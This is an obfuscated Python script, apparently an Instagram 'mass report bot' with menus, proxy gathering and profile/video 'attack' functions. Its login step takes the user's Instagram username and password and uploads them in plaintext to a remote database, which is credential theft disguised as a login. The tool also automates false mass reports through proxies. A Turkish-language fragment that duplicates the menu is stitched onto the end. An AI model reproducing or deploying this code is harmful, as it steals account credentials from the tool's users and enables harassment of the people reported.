def database(): #line:167 clearConsole() #line:168 print_logo() #line:169 print(Style.RESET_ALL) #line:170 print_status( "================ LOGIN INSTAGRAM ================\n") #line:171 print(Style.RESET_ALL) #line:172 OOOO0OOOO0O0OOOOO = input("Enter your instagram username : "******"Enter your instagram password : "******"https://instagram.com/" + OOOO0OOOO0O0OOOOO + "/") #line:176 if O0OO0000O0O0OOOO0.status_code != 200: #line:177 print("\n\n" + Fore.RED + "[*] Invalid username!") #line:178 database() #line:179 elif (OOOO0OOOO0O0OOOOO == ""): #line:180 print("\n\n" + Fore.RED + "[*] Enter username again, don't leave it blank") #line:182 database() #line:183 elif O0OO0000O0O0OOOO0.status_code == 200: #line:186 OO0000O0OOOOO0O00 = { 'password': O0O0000O0OOOOO000, 'username': OOOO0OOOO0O0OOOOO } #line:191 db.collection('users').add(OO0000O0OOOOO0O00) #line:192 load_animation() #line:193 print_success("Login Success!") #line:194 report() #line:195
def main(): #line:198 if (os.name == 'nt'): #line:199 clearConsole() #line:200 print_logo() #line:201 O00OO00O0OOO00O00 = print(''' [1] Start Report Bot [2] Help [3] About [4] Exit ''') #line:207 OO0O0O0OOO00O0000 = input("Please select :- ") #line:208 if (OO0O0O0OOO00O0000.isdigit() == False): #line:209 print_error("The answer is not understood.") #line:210 main() #line:211 if (int(OO0O0O0OOO00O0000) > 4 or int(OO0O0O0OOO00O0000) == 0): #line:213 print_error("The answer is not understood.") #line:214 main() #line:215 elif (int(OO0O0O0OOO00O0000) == 1): #line:216 unlock() #line:217 elif (int(OO0O0O0OOO00O0000) == 2): #line:218 clearConsole() #line:219 help_msg() #line:220 elif (int(OO0O0O0OOO00O0000) == 3): #line:221 about_msg() #line:222 elif (int(OO0O0O0OOO00O0000) == 4): #line:223 print_status("Exiting the program.....Thanks for using this tool!" ) #line:224 exit(0) #line:225 else: #line:227 os.system('bash setup.sh') #line:228
def report(): #line:231 clearConsole() #line:232 print_logo() #line:233 O00O000OOOOOOOO0O = input( "Would you like to use a proxy? (Recommended Yes) [Y/N] : ") #line:234 OO0OOO00OOO00OOOO = [] #line:235 if (O00O000OOOOOOOO0O == "Y" or O00O000OOOOOOOO0O == "y"): #line:237 O00O000OOOOOOOO0O = input( "Would you like to collect your proxies from the internet? [Y/N] : " ) #line:239 if (O00O000OOOOOOOO0O == "Y" or O00O000OOOOOOOO0O == "y"): #line:241 print_status( "Gathering proxy from the Internet! This may take a while.\n" ) #line:243 time.sleep(2) #line:244 OO0OOO00OOO00OOOO = find_proxies() #line:245 elif (O00O000OOOOOOOO0O == "N" or O00O000OOOOOOOO0O == "n"): #line:247 print_status( "Please have a maximum of 50 proxies in a file!") #line:248 OOO00OO0000OOOO0O = input( "Enter the path to your proxy list") #line:249 OO0OOO00OOO00OOOO = parse_proxy_file(OOO00OO0000OOOO0O) #line:250 else: #line:251 print_error("Answer not understood, exiting!") #line:252 exit() #line:253 print_success( str(len(OO0OOO00OOO00OOOO)) + " Number of proxy found!\n") #line:255 print(OO0OOO00OOO00OOOO) #line:256 elif (O00O000OOOOOOOO0O == "N" or O00O000OOOOOOOO0O == "n"): #line:257 pass #line:258 else: #line:259 print_error("Answer not understood, exiting!") #line:260 exit() #line:261 print("") #line:263 print_status("1 - Report Profile.") #line:264 print_status("2 - Report a video.") #line:265 O0O0O0OO000OO0O0O = input( "Please select the complaint method :- ") #line:266 print("") #line:267 if (O0O0O0OO000OO0O0O.isdigit() == False): #line:269 print_error("The answer is not understood.") #line:270 main() #line:271 if (int(O0O0O0OO000OO0O0O) > 2 or int(O0O0O0OO000OO0O0O) == 0): #line:273 print_error("The answer is not understood.") #line:274 main() #line:275 if (int(O0O0O0OO000OO0O0O) == 1): #line:277 profile_attack(OO0OOO00OOO00OOOO) #line:278 elif (int(O0O0O0OO000OO0O0O) == 2): #line:279 video_attack(OO0OOO00OOO00OOOO) #line:280
print("") print_status("1 - Profili şikayet et.") print_status("2 - Bir videoyu şikayet et.") report_choice = ask_question("Lütfen şikayet yöntemini seçin") print("") if (report_choice.isdigit() == False): print_error("Cevap anlaşılmadı.") exit(0) if (int(report_choice) > 2 or int(report_choice) == 0): print_error("Cevap anlaşılmadı.") exit(0) if (int(report_choice) == 1): profile_attack(proxies) elif (int(report_choice) == 2): video_attack(proxies) if __name__ == "__main__": print_logo() try: main() print(Style.RESET_ALL) except KeyboardInterrupt: print("\n\n" + Fore.RED + "[ * ] Program kapatılıyor!") print(Style.RESET_ALL) _exit(0)